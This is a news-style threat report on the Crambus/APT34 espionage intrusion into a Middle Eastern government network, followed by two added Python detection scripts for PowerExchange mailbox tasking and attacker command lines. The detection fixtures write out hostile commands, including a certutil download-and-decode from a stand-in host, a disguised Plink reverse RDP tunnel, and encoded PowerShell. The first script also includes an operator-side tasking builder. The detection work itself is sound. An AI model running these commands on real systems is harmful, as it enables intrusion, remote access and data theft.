Exploring the Crambus Activity Connected to Iranian APT34 and MuddyWater

Crambus Activity Details

Crambus, an Iran-linked espionage group, was reported to have infiltrated the network of a Middle Eastern government. According to Broadcom's Symantec threat-hunting team, the group maintained a presence in the compromised network for eight months, during which it stole data, harvested credentials, and deployed malware on multiple systems. The intrusion began on February 1 with a PowerShell script executed on a single system. Further systems were compromised in phases over the following months, with malicious activity escalating through late August and into September. In total, Symantec recorded evidence of malicious activity on at least 12 computers, and backdoors and keyloggers deployed on dozens more.

Crambus and its Iran Connection

Crambus is Symantec's name for the group that other security vendors track as APT34 (also known as Cobalt Gypsy, OilRig, and Helix Kitten). Its activity has also been linked to MuddyWater (also known as Mango Sandstorm, Mercury, Seedworm, and Static Kitten), a separate Iranian espionage group. Both APT34 and MuddyWater conduct espionage aligned with the objectives of the Iranian government, and US Cyber Command has publicly attributed MuddyWater to Iran's Ministry of Intelligence and Security. Together, these links support the attribution of Crambus to Iran.

Deployed Malware Families

During this intrusion Crambus installed PowerExchange, a PowerShell backdoor that logs into a Microsoft Exchange server and uses a mailbox as its command-and-control channel. The group also deployed three previously undocumented malware families: the Tokel backdoor, the Dirps trojan, and the Clipog infostealer. Between them, these tools gave the attackers the ability to execute commands, download files, steal clipboard contents, log keystrokes, and record which process each keystroke was typed into.

Network Compromise and Remote Access

To move deeper into the network, the attackers used Plink, the command-line connection tool from the PuTTY SSH suite, to set up port-forwarding rules that carried Remote Desktop Protocol (RDP) sessions over SSH tunnels. They also modified firewall rules to permit the remote access they needed. Combined with the PowerExchange backdoor and the newly deployed malware, this gave them persistent control of the network and a continuing ability to exfiltrate data.

The Attack Overview

The Iran-linked group Crambus, also known as OilRig, carried out a carefully planned intrusion into a Middle Eastern government network, notable for its long duration and the range of tools, scripts, and techniques used. The intrusion began on February 1, 2023 and ran for eight months, with evidence of malicious activity on at least 12 computers.

Commencement of the Attack

The intrusion began quietly with a PowerShell script run on a single system. During the first week the attackers ran this script several times, gradually expanding their activity. By February 5 a second system had been compromised, and the attackers used a disguised copy of Plink to configure port forwarding on it so that RDP could be reached over an SSH tunnel.

Cross-system Expansion

On February 21 the command 'netstat /an' was run on a web server, a reconnaissance step that lists the server's listening ports and active connections and shows the attackers had by then reached that host. In April two more systems were compromised, and Mimikatz was deployed on them to harvest credentials. By June the attackers had spread across multiple systems and held a firm foothold in the network.

Deepening Intrusion and Malicious Activity

The main phase of the attack began with the execution of Backdoor.Tokel and PowerExchange on compromised machines. The attackers then deployed Trojan.Dirps and Infostealer.Clipog and established SSH tunnels with Plink, a sign that they could now route traffic freely inside the network. In August they turned to scanning for Log4j vulnerabilities, and by the end of the month they had compromised another web server.

Attack Peak and Decline

By early September the attackers had breached three more computers and were using certutil, a built-in Windows certificate utility commonly abused to download and decode files, to bring in further tooling. Activity peaked in the first half of September, when two more systems were compromised and Backdoor.Tokel was executed on them, and began to decline after September 9, by which point the attackers had extended their access across much of the compromised network.

Deployed Malware and Backdoor

The Iranian group known as OilRig or APT34 is known for blending its activity into normal administrative traffic to reduce the chance of detection. The core of its approach in this intrusion was a backdoor that hides its command channel inside the victim's own mail flow, combined with firewall changes that opened the remote access it needed. Equally notable is its use of several malware families at once, which diversified its tooling and made the intrusion more resilient to partial cleanup.

PowerExchange Backdoor Installation

The attackers installed a PowerShell backdoor known as PowerExchange, which logs into an Exchange server and watches incoming mail for a marker: the string "@@" in the subject line, which tells the malware that the message carries base64-encoded attachments containing commands. The backdoor decodes and executes these as arbitrary PowerShell commands, typically to write files or exfiltrate data, and then moves the processed messages to Deleted Items to reduce the likelihood that anyone notices them.
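The mailbox-based tasking channel described above, as an added detection example that is not part of the original article or of Symantec's analysis: it models a mailbox export (for instance pulled over EWS or Graph) as a list of records, picks out messages whose subject carries the "@@" marker and whose attachments decode from base64 to printable text, and also builds such a message from the operator's side so the detector can be round-tripped. The record layout, folder names, sample commands, and the assumption that the attachment body is the base64 text itself are illustrative; the real PowerExchange attachment format is not given on the page.

```python
import base64
import binascii

MARKER = "@@"  # subject marker the page reports PowerExchange looks for


def _b64(text: str) -> bytes:
    """Helper for building the constructed sample attachments below."""
    return base64.b64encode(text.encode("utf-8"))


# Constructed sample mailbox records (not real mail). Only the fields the detector
# needs are modelled: id, folder, subject, and raw attachment bodies.
SAMPLE_MESSAGES = [
    {"id": 1, "folder": "Inbox", "subject": "Quarterly budget",
     "attachments": [b"%PDF-1.7 binary content"]},
    {"id": 2, "folder": "Deleted Items", "subject": "@@ task",
     "attachments": [_b64(r"Get-ChildItem C:\Users -Recurse | Out-File C:\ProgramData\l.txt")]},
    {"id": 3, "folder": "Deleted Items", "subject": "Re: @@ task",
     "attachments": [_b64(r"$c = Get-Content C:\ProgramData\l.txt; $c.Length")]},
    {"id": 4, "folder": "Inbox", "subject": "@@ lunch?", "attachments": []},
    {"id": 5, "folder": "Inbox", "subject": "Invoice 4471",
     "attachments": [_b64("whoami")]},
]


def _decode_command(blob: bytes):
    """Return the decoded text if blob is well-formed base64 of printable text, else None.

    validate=True rejects any byte outside the base64 alphabet, so ordinary binary
    attachments (PDFs, images) fall out here rather than producing garbage."""
    try:
        raw = base64.b64decode(blob, validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, ValueError):
        return None
    if not text or not all(ch.isprintable() or ch.isspace() for ch in text):
        return None
    return text


def extract_tasking(messages, marker=MARKER):
    """Return one record per decoded command found in marker-tagged messages.

    Both conditions must hold: the marker in the subject AND an attachment that
    decodes cleanly. A marker alone (message 4) or a base64 attachment alone
    (message 5) is not reported. The folder is kept because the page notes the
    backdoor moves processed mail to Deleted Items, so that is where evidence of
    already-executed tasking accumulates."""
    found = []
    for m in messages:
        if marker not in m.get("subject", ""):
            continue
        for att in m.get("attachments", []):
            cmd = _decode_command(att)
            if cmd is not None:
                found.append({"id": m["id"], "folder": m["folder"], "command": cmd})
    return found


def build_tasking(command: str, marker=MARKER):
    """Operator side of the channel as the page describes it: marker in the subject,
    base64-encoded command as the attachment. This is an assumed layout used only to
    round-trip the detector; it is not the real PowerExchange message format."""
    return {
        "id": None,
        "folder": "Inbox",
        "subject": f"{marker} status",
        "attachments": [base64.b64encode(command.encode("utf-8"))],
    }


if __name__ == "__main__":
    for hit in extract_tasking(SAMPLE_MESSAGES):
        print(f"msg {hit['id']} in {hit['folder']!r}: {hit['command']}")
```

When hunting a real mailbox, start with Deleted Items rather than the Inbox, since the backdoor moves each processed message there; the same function works on either folder's export.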

Usage of Plink Tool and Firewall Manipulation

APT34 also used Plink, the command-line connection tool of the PuTTY SSH suite, to set port-forwarding rules that carried RDP sessions over SSH tunnels. Combined with firewall rules modified to allow that traffic, this let the attackers move deeper into the network and broaden their access.
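Because the attackers ran Plink under a disguised name, a hunt that keys on the file name alone misses it. The following script is an added example, not code from the article or from Symantec; it runs a small set of command-line signatures over constructed process-creation records (the shape of Windows Security event 4688 or Sysmon event 1) covering the Plink port forwarding and firewall change described here, the certutil downloads and the netstat reconnaissance mentioned earlier on this page, and the encoded PowerShell that typically accompanies such tooling. Host names, paths, rule names and addresses are invented; 203.0.113.0/24 is a documentation range.

```python
import re
from collections import defaultdict

# Constructed sample process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WEB01", "cmdline": "netstat /an"},
    # Plink renamed to look like svchost: no shell (-N), reverse forward of RDP, password on the command line
    {"host": "WS07", "cmdline": r"C:\Users\Public\svchost.exe -N -R 3389:127.0.0.1:3389 -pw Passw0rd tunnel@203.0.113.5"},
    {"host": "WS07", "cmdline": 'netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389'},
    {"host": "WS09", "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.5/u.txt C:\ProgramData\u.txt"},
    {"host": "WS09", "cmdline": r"certutil.exe -decode C:\ProgramData\u.txt C:\ProgramData\u.exe"},
    {"host": "WS11", "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"},
    # Benign look-alikes: the real svchost, and an interactive plink session with no tunnel
    {"host": "WS03", "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"host": "WS02", "cmdline": "plink.exe -ssh admin@jump.corp.example"},
]


def _any(*patterns):
    """Predicate: true if any pattern matches the command line."""
    compiled = [re.compile(p) for p in patterns]
    return lambda c: any(r.search(c) for r in compiled)


def _all(*patterns):
    """Predicate: true only if every pattern matches the command line."""
    compiled = [re.compile(p) for p in patterns]
    return lambda c: all(r.search(c) for r in compiled)


# Rules key on argument shape, not image name, so a renamed Plink is still caught.
RULES = [
    # -R/-L listen-port:host:port is the SSH port-forward syntax Plink shares with OpenSSH
    ("ssh_port_forward", _any(r"(^|\s)-[RL]\s*\d{1,5}:\S+:\d{1,5}(\s|$)")),
    # -N (no remote shell) together with -pw (password on the command line): an unattended tunnel
    ("plink_batch_tunnel", _all(r"(^|\s)-N(\s|$)", r"(?i)(^|\s)-pw\s+\S+")),
    # inbound allow rule for RDP added via netsh
    ("firewall_allow_rdp", _any(r"(?i)netsh\s+advfirewall\s+firewall\s+add\s+rule\b(?=.*action=allow)(?=.*localport=3389\b)")),
    # certutil abused as a downloader and as a base64 decoder
    ("certutil_download", _any(r"(?i)\bcertutil(\.exe)?\b.*-urlcache\b.*https?://")),
    ("certutil_decode", _any(r"(?i)\bcertutil(\.exe)?\b.*-decode\b")),
    # connection/listener enumeration, the step the page records on the web server
    ("netstat_recon", _any(r"(?i)\bnetstat(\.exe)?\s+[-/]an?\b")),
    # base64-encoded PowerShell command line
    ("encoded_powershell", _any(r"(?i)\bpowershell(\.exe)?\b.*\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}")),
]


def hunt(events):
    """Return one hit per (event, rule) pair whose command line matches."""
    hits = []
    for ev in events:
        for name, pred in RULES:
            if pred(ev["cmdline"]):
                hits.append({"host": ev["host"], "rule": name, "cmdline": ev["cmdline"]})
    return hits


def rules_by_host(events):
    """Collapse hits to host -> set of rule names, the view an analyst triages first."""
    out = defaultdict(set)
    for h in hunt(events):
        out[h["host"]].add(h["rule"])
    return dict(out)


if __name__ == "__main__":
    for host, names in sorted(rules_by_host(SAMPLE_EVENTS).items()):
        print(f"{host}: {', '.join(sorted(names))}")
```

The two benign records are there on purpose: the genuine svchost and the interactive plink session produce no hits, while the renamed Plink on WS07 is caught three times over by its arguments and by the firewall change that follows it. Hosts that accumulate several of these rules in a short window are the ones to pull full timelines for.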

Deployment of New Malware Families

APT34 also diversified its tooling by introducing new malware families: the Tokel backdoor, which executes PowerShell commands and downloads files; the Dirps trojan, which enumerates files and runs PowerShell commands; and the Clipog infostealer, which steals clipboard contents, logs keystrokes, and records the process in which each keystroke was entered.

Implications of Crambus’s Presence

The extended presence of Crambus in a Middle Eastern government network is a serious security concern. The group's ability to operate covertly while stealing data over a long period underlines its capability and the threat it poses to national infrastructure. The low profile of the intrusion allowed Crambus to compromise at least 12 computers, and probably more, and to remain undetected for eight months, which raises questions about the effectiveness of the defenses in place.

Relevant Authority Actions

In response to threats such as Crambus, authorities have been taking action against criminal infrastructure, including the recent seizure of the RagnarLocker ransomware group's dark web site. Such actions underline the growing urgency of proactive measures against cybercriminals.

Related Cyber Attacks

The sustained activity of Crambus is part of a broader pattern of state-sponsored advanced persistent threat (APT) actors conducting sophisticated intrusions. Several other Iran-linked groups have been tied to recent incidents: Iranian APTs were found exploiting a recent vulnerability in the PaperCut print-management software, and Iranian cyberspies targeted a US-based think tank with novel macOS malware. These incidents underscore the growing reach and sophistication of Iran-linked cyber operations.

Reactionary Times News Desk

All breaking news stories that matter to America. The News Desk is covered by the sharpest eyes in news media, as they decipher fact from fiction.
